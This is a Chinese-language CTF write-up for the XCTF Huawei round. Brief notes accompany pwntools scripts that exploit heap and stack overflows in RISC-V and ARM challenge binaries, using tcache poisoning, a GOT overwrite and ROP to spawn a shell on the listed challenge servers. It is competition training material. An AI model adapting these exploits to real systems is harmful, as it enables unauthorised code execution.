XCTF-华为专场

题目不难,只是各种环境搭建吧。。反正我是没搞起来鸿蒙的环境(TCL),第一场的时候在hxp了。最后没办法去final,那只能给final出题了,希望大家玩的开心。

risc-v环境

honorbook

因为有一定时间了有点忘记了,应该是一个单字节的溢出,远程没有开alsr,2.27的libc(以下都是2.27),然后就是tcache attack就可以了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
rom pwn import*
import sys
context.log_level='debug'
context.arch='arm'
remote_gdb=True

def get_sh(other_libc = null):
global libc
remote=0
if remote:
global p
p = remote('121.36.192.114',9999)
elif remote_gdb:
sh = process(["./qemu-riscv64", "-g", "1234", "-L", "./libs", "./honorbook"])
log.info('Please use GDB remote!(Enter to continue)')
raw_input()
return sh
else :
return process(["./qemu-riscv64", "-L", "/usr/arm-linux-gnueabi", "./melong"])

def add(idx,na,ma):
p.recvuntil(": ")
p.sendline("1")
p.recvuntil(": ")
p.sendline(str(idx))
p.recvuntil(": ")
p.sendline(na)
p.recvuntil(": ")
p.send(ma)
def delete(idx):
p.recvuntil(": ")
p.sendline(str(2))
p.recvuntil(": ")
p.sendline(str(idx))
def show(idx):
p.recvuntil(": ")
p.sendline(str(3))
p.recvuntil(": ")
p.sendline(str(idx))
def edit(idx,ma):
p.recvuntil(": ")
p.sendline("4")
p.recvuntil(": ")
p.sendline(str(idx))
p.recvuntil(": ")
p.sendline(str(ma))
if __name__ == "__main__":
#p = get_sh(True)
p =remote("121.36.192.114",9999)
lib_base=0x4000886000
add(1,"\x11","\x11\n")
add(2,"\x22","\x22\n")
add(3,"\x33","\x33\n")
delete(1)
add(1,"\x11","\xf1"*0xe9)
delete(2)
add(2,b"/bin/sh\x00",b"\x00"*0x28+p64(0xf1)+p64(lib_base+0x209830)+b"\n")
add(5,"\x11","\x33\n")
add(6,"\x11",p64(lib_base+0x1388fe)*2+b"\n")
delete(2)
p.interactive()

harmoshell

很迷,一个迷惑的栈溢出漏洞,同样的没有alsr,所以先leak在做。用到的地址是libc放进ghidra里找到。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/env python
# coding=utf-8
from pwn import*

p = remote("121.37.222.236","9999")
#p = process(["./qemu-riscv64", "-g", "1234", "-L", "./libs", "./harmoshell"])
context.log_level="debug"
def add(name):
p.recvuntil("$")
p.sendline("touch "+str(name))
def show(name):
p.recvuntil("$")
p.sendline("cat "+str(name))

def echo(name,cn,idx):
p.recvuntil(("$"))
if idx:
p.sendline("echo > "+str(name))
sleep(0.1)
p.sendline(cn)
else:
p.sendline("echo >> "+str(name))
sleep(0.1)
p.sendline(cn)
def rm(name):
p.recvuntil("$")
p.sendline("rm "+str(name))

def ls():
p.recvuntil("$")
p.sendline("ls")

libc_base = 0x4000886000
offset = 0x00000040008004d0-0x0000004000800390-0x8
execv_offset = libc_base+0x00183814
echo("test"+str(0),(b"b"*0x8+p64(0)+b"b"*0x8+p64(0)*2+p64(execv_offset)).rjust(offset+8,b"a"),1)
p.interactive()

harmoshell

堆溢出,简单题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
context.log_level=True
#sh = remote("121.36.58.215",1337)
#sh=process("./qemu-riscv64 -L ./libs/ ./harmoshell2",shell=True)
#sh= process('./a.out')
libc=ELF('libc-2.27.so')
sh=remote('139.159.132.55',9999)
elf = ELF("harmoshell2")
#libc = ELF("libuClibc-1.0.34.so")
def touch(filename):
sh.recvuntil("$ ")
sh.sendline("touch "+str(filename))
def rm(filename):
sh.recvuntil("$ ")
sh.sendline("rm "+str(filename))
def cat(filename):
sh.recvuntil("$ ")
sh.sendline("cat "+str(filename))
def echo(filename,data):
sh.recvuntil("$ ")
sh.sendline("echo > "+str(filename))
sh.sendline(str(data))
def echo2(filename,data):
sh.recvuntil("$ ")
sh.sendline("echo >> "+str(filename))
sh.send(str(data))
'''
for i in range(10):
touch(str(i))

for i in range(6):
rm(str(7-i))
rm(0)
rm(1)
for i in range(6):
touch(str(i))
touch(5)
touch(6)
echo(6,'a'*7)
#echo2(6,'b'*0x8)
cat(6)
#p.recvuntil('a'*7+'\x0a')
'''
raw_input()
libcbase=0x4000a8d9f8-(0x0000004000a929f8-0x400088B000)
free=libcbase+libc.sym['__free_hook']
print hex(libcbase)
system=libcbase+libc.sym['system']
one=libcbase+0x018381c
touch(5)
touch(6)

echo(5,'/bin/sh\x00'+'a'*0xf7)
echo2(5,'b'*0x10+p64(6)+'e'*0x8+p64(elf.got['strlen']))
#cat('\x06')
sh.recvuntil("$ ")
sh.sendline("echo > "+'\x06')
sh.send(p64(system))
sh.recvuntil("$ ")
sh.sendline("/bin/sh\x00")
#raw_input()
#rm('\x06')

sh.interactive()

arm

没开alsr,leak然后打,神似国赛题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *

debug=0

#context.terminal = ['tmux','-x','sh','-c']
context.terminal = ['tmux', 'splitw', '-h' ]
context.log_level='debug'

if debug:
p=process('')
#p=process('',env={'LD_PRELOAD':'./libc.so'})
gdb.attach(p)
else:
p=remote('139.159.210.220',9999)

def ru(x):
return p.recvuntil(x)

def se(x):
p.send(x)

def sl(x):
p.sendline(x)

ru('input: ')
base = 0xff69e000
system = base + 0x34810
binsh = base + 0xfe861
#se('a'*0x100+p32(0x104A0)+p32(0x10540)+p32(0x2100C)+p32(0)+p32(0x2100C)+p32(0)*2+p32(0)*2+p32(0x10548))
se('a'*0x100+p32(0x104A0)+p32(0x10540)+p32(0x2100C)+p32(0)+p32(binsh)+p32(0)*2+p32(0)*2+p32(0x10348)+p32(system)+p32(0x1054C))

p.interactive()

总结

今年算是没怎么打比赛,刚开始第一场,还有一场hxp,后面可能会更,希望大家xctf-fiinal玩的开心。